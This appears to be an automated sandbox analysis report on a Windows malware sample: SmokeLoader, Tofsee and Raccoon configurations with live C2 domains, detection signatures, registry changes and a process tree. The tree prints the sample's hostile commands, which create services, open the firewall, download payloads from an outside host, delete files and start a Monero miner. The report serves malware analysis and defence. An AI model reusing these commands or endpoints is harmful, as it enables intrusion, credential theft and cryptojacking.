Analysis
-
max time kernel
147s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
09/01/2022, 17:46
Static task
static1
General
-
Target
246b41453b996bfa14f60d4785e598ac.exe
-
Size
292KB
-
MD5
246b41453b996bfa14f60d4785e598ac
-
SHA1
977b7d8cc4237ca4c8a2268aedfff4d83c7d0a86
-
SHA256
08a6dfeb7adf5eb90703abfab6c1f24a9f93c79e6287213f695c44f0181644ec
-
SHA512
122fbf1cf7202ac0370471e5d1faf19c3d211a75b7629221daf0dd3c6a7c3260db0fdc22da7161dd53c9f646f2400dbde80751139d20d1e0f977869b60224bd2
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
tofsee
patmushta.info
parubey.info
Extracted
raccoon
1.8.4-hotfixs
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
description pid Process procid_target PID 2232 created 3792 2232 WerFault.exe 97 -
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Arkei Stealer Payload 5 IoCs
resource yara_rule behavioral2/memory/4016-132-0x0000000000400000-0x0000000002B86000-memory.dmp family_arkei behavioral2/memory/4044-213-0x00000000000C0000-0x000000000047F000-memory.dmp family_arkei behavioral2/memory/4044-214-0x00000000000C0000-0x000000000047F000-memory.dmp family_arkei behavioral2/memory/4044-216-0x00000000000C0000-0x000000000047F000-memory.dmp family_arkei behavioral2/memory/4044-217-0x00000000000C0000-0x000000000047F000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/1084-323-0x0000000001050000-0x00000000014AB000-memory.dmp loaderbot -
Blocklisted process makes network request 1 IoCs
flow pid Process 157 2260 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 22 IoCs
pid Process 3924 6D0E.exe 4016 8DC6.exe 2232 9AD7.exe 2840 A519.exe 1576 przyooif.exe 1564 A519.exe 3812 14DB.exe 1952 14DB.exe 4044 2789.exe 3792 4469.exe 2316 660B.exe 1708 850E.exe 3156 9AF8.exe 4000 extd.exe 3752 extd.exe 2680 setup1.exe 3656 extd.exe 1664 setup2.exe 3720 extd.exe 1084 setup3.exe 4044 extd.exe 3228 Driver.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/files/0x000500000001ab3c-279.dat upx behavioral2/files/0x000500000001ab3c-280.dat upx behavioral2/files/0x000500000001ab3c-285.dat upx behavioral2/files/0x000500000001ab3c-290.dat upx behavioral2/files/0x000500000001ab3c-312.dat upx behavioral2/files/0x000500000001ab3c-320.dat upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2789.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2789.exe -
Deletes itself 1 IoCs
pid Process 3036 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url setup3.exe -
Loads dropped DLL 3 IoCs
pid Process 4044 2789.exe 4044 2789.exe 4044 2789.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\setup3.exe" setup3.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2789.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4044 2789.exe 4044 2789.exe 1708 850E.exe 1664 setup2.exe 1084 setup3.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2652 set thread context of 3664 2652 246b41453b996bfa14f60d4785e598ac.exe 68 PID 1576 set thread context of 1068 1576 przyooif.exe 88 PID 2840 set thread context of 1564 2840 A519.exe 87 PID 3812 set thread context of 1952 3812 14DB.exe 95 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2232 3792 WerFault.exe 97 2404 2680 WerFault.exe 111 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 246b41453b996bfa14f60d4785e598ac.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 246b41453b996bfa14f60d4785e598ac.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 246b41453b996bfa14f60d4785e598ac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6D0E.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6D0E.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6D0E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 14DB.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 14DB.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 14DB.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 2789.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 2789.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2472 timeout.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings cmd.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 157 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3664 246b41453b996bfa14f60d4785e598ac.exe 3664 246b41453b996bfa14f60d4785e598ac.exe 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3036 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 3664 246b41453b996bfa14f60d4785e598ac.exe 3924 6D0E.exe 3036 Process not Found 3036 Process not Found 3036 Process not Found 3036 Process not Found 1952 14DB.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeDebugPrivilege 2840 A519.exe Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeDebugPrivilege 1564 A519.exe Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeDebugPrivilege 2316 660B.exe Token: SeRestorePrivilege 2232 WerFault.exe Token: SeBackupPrivilege 2232 WerFault.exe Token: SeDebugPrivilege 2232 WerFault.exe Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found Token: SeShutdownPrivilege 3036 Process not Found Token: SeCreatePagefilePrivilege 3036 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2652 wrote to memory of 3664 2652 246b41453b996bfa14f60d4785e598ac.exe 68 PID 2652 wrote to memory of 3664 2652 246b41453b996bfa14f60d4785e598ac.exe 68 PID 2652 wrote to memory of 3664 2652 246b41453b996bfa14f60d4785e598ac.exe 68 PID 2652 wrote to memory of 3664 2652 246b41453b996bfa14f60d4785e598ac.exe 68 PID 2652 wrote to memory of 3664 2652 246b41453b996bfa14f60d4785e598ac.exe 68 PID 2652 wrote to memory of 3664 2652 246b41453b996bfa14f60d4785e598ac.exe 68 PID 3036 wrote to memory of 3924 3036 Process not Found 70 PID 3036 wrote to memory of 3924 3036 Process not Found 70 PID 3036 wrote to memory of 3924 3036 Process not Found 70 PID 3036 wrote to memory of 4016 3036 Process not Found 71 PID 3036 wrote to memory of 4016 3036 Process not Found 71 PID 3036 wrote to memory of 4016 3036 Process not Found 71 PID 3036 wrote to memory of 2232 3036 Process not Found 72 PID 3036 wrote to memory of 2232 3036 Process not Found 72 PID 3036 wrote to memory of 2232 3036 Process not Found 72 PID 3036 wrote to memory of 2840 3036 Process not Found 73 PID 3036 wrote to memory of 2840 3036 Process not Found 73 PID 3036 wrote to memory of 2840 3036 Process not Found 73 PID 2232 wrote to memory of 1268 2232 9AD7.exe 74 PID 2232 wrote to memory of 1268 2232 9AD7.exe 74 PID 2232 wrote to memory of 1268 2232 9AD7.exe 74 PID 2232 wrote to memory of 712 2232 9AD7.exe 76 PID 2232 wrote to memory of 712 2232 9AD7.exe 76 PID 2232 wrote to memory of 712 2232 9AD7.exe 76 PID 2232 wrote to memory of 2976 2232 9AD7.exe 78 PID 2232 wrote to memory of 2976 2232 9AD7.exe 78 PID 2232 wrote to memory of 2976 2232 9AD7.exe 78 PID 2232 wrote to memory of 1256 2232 9AD7.exe 80 PID 2232 wrote to memory of 1256 2232 9AD7.exe 80 PID 2232 wrote to memory of 1256 2232 9AD7.exe 80 PID 2232 wrote to memory of 1224 2232 9AD7.exe 82 PID 2232 wrote to memory of 1224 2232 9AD7.exe 82 PID 2232 wrote to memory of 1224 2232 9AD7.exe 82 PID 2232 wrote to memory of 1852 2232 9AD7.exe 85 PID 2232 wrote to memory of 1852 2232 9AD7.exe 85 PID 2232 wrote to memory of 1852 2232 9AD7.exe 85 PID 2840 wrote to memory of 1564 2840 A519.exe 87 PID 2840 wrote to memory of 1564 2840 A519.exe 87 PID 2840 wrote to memory of 1564 2840 A519.exe 87 PID 1576 wrote to memory of 1068 1576 przyooif.exe 88 PID 1576 wrote to memory of 1068 1576 przyooif.exe 88 PID 1576 wrote to memory of 1068 1576 przyooif.exe 88 PID 1576 wrote to memory of 1068 1576 przyooif.exe 88 PID 1576 wrote to memory of 1068 1576 przyooif.exe 88 PID 2840 wrote to memory of 1564 2840 A519.exe 87 PID 2840 wrote to memory of 1564 2840 A519.exe 87 PID 2840 wrote to memory of 1564 2840 A519.exe 87 PID 2840 wrote to memory of 1564 2840 A519.exe 87 PID 2840 wrote to memory of 1564 2840 A519.exe 87 PID 3036 wrote to memory of 3824 3036 Process not Found 92 PID 3036 wrote to memory of 3824 3036 Process not Found 92 PID 3036 wrote to memory of 3824 3036 Process not Found 92 PID 3036 wrote to memory of 3824 3036 Process not Found 92 PID 3036 wrote to memory of 3460 3036 Process not Found 93 PID 3036 wrote to memory of 3460 3036 Process not Found 93 PID 3036 wrote to memory of 3460 3036 Process not Found 93 PID 3036 wrote to memory of 3812 3036 Process not Found 94 PID 3036 wrote to memory of 3812 3036 Process not Found 94 PID 3036 wrote to memory of 3812 3036 Process not Found 94 PID 3812 wrote to memory of 1952 3812 14DB.exe 95 PID 3812 wrote to memory of 1952 3812 14DB.exe 95 PID 3812 wrote to memory of 1952 3812 14DB.exe 95 PID 3812 wrote to memory of 1952 3812 14DB.exe 95 PID 3812 wrote to memory of 1952 3812 14DB.exe 95 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\246b41453b996bfa14f60d4785e598ac.exe"C:\Users\Admin\AppData\Local\Temp\246b41453b996bfa14f60d4785e598ac.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Admin\AppData\Local\Temp\246b41453b996bfa14f60d4785e598ac.exe"C:\Users\Admin\AppData\Local\Temp\246b41453b996bfa14f60d4785e598ac.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3664
-
-
C:\Users\Admin\AppData\Local\Temp\6D0E.exeC:\Users\Admin\AppData\Local\Temp\6D0E.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3924
-
C:\Users\Admin\AppData\Local\Temp\8DC6.exeC:\Users\Admin\AppData\Local\Temp\8DC6.exe1⤵
- Executes dropped EXE
PID:4016
-
C:\Users\Admin\AppData\Local\Temp\9AD7.exeC:\Users\Admin\AppData\Local\Temp\9AD7.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\goksbuhw\2⤵PID:1268
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\przyooif.exe" C:\Windows\SysWOW64\goksbuhw\2⤵PID:712
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create goksbuhw binPath= "C:\Windows\SysWOW64\goksbuhw\przyooif.exe /d\"C:\Users\Admin\AppData\Local\Temp\9AD7.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:2976
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description goksbuhw "wifi internet conection"2⤵PID:1256
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start goksbuhw2⤵PID:1224
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\A519.exeC:\Users\Admin\AppData\Local\Temp\A519.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\A519.exeC:\Users\Admin\AppData\Local\Temp\A519.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\SysWOW64\goksbuhw\przyooif.exeC:\Windows\SysWOW64\goksbuhw\przyooif.exe /d"C:\Users\Admin\AppData\Local\Temp\9AD7.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:1068
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3824
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3460
-
C:\Users\Admin\AppData\Local\Temp\14DB.exeC:\Users\Admin\AppData\Local\Temp\14DB.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Users\Admin\AppData\Local\Temp\14DB.exeC:\Users\Admin\AppData\Local\Temp\14DB.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1952
-
-
C:\Users\Admin\AppData\Local\Temp\2789.exeC:\Users\Admin\AppData\Local\Temp\2789.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:4044 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2789.exe" & exit2⤵PID:736
-
C:\Windows\SysWOW64\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:2472
-
-
-
C:\Users\Admin\AppData\Local\Temp\4469.exeC:\Users\Admin\AppData\Local\Temp\4469.exe1⤵
- Executes dropped EXE
PID:3792 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3792 -s 9162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\660B.exeC:\Users\Admin\AppData\Local\Temp\660B.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
C:\Users\Admin\AppData\Local\Temp\850E.exeC:\Users\Admin\AppData\Local\Temp\850E.exe1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1708
-
C:\Users\Admin\AppData\Local\Temp\9AF8.exeC:\Users\Admin\AppData\Local\Temp\9AF8.exe1⤵
- Executes dropped EXE
PID:3156 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\9B9D.bat C:\Users\Admin\AppData\Local\Temp\9AF8.exe"2⤵
- Modifies registry class
PID:3976 -
C:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:4000
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28280\123.vbs"3⤵
- Blocklisted process makes network request
PID:2260
-
-
C:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exe "/download" "http://a0617224.xsph.ru/1.exe" "setup1.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3752
-
-
C:\Users\Admin\AppData\Local\Temp\28280\setup1.exesetup1.exe3⤵
- Executes dropped EXE
PID:2680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 4124⤵
- Program crash
PID:2404
-
-
-
C:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exe "/download" "http://a0617224.xsph.ru/2.exe" "setup2.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3656
-
-
C:\Users\Admin\AppData\Local\Temp\28280\setup2.exesetup2.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1664
-
-
C:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exe "/download" "http://a0617224.xsph.ru/3.exe" "setup3.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:3720
-
-
C:\Users\Admin\AppData\Local\Temp\28280\setup3.exesetup3.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1084 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 14⤵
- Executes dropped EXE
PID:3228
-
-
-
C:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9B9B.tmp\9B9C.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
PID:4044
-
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1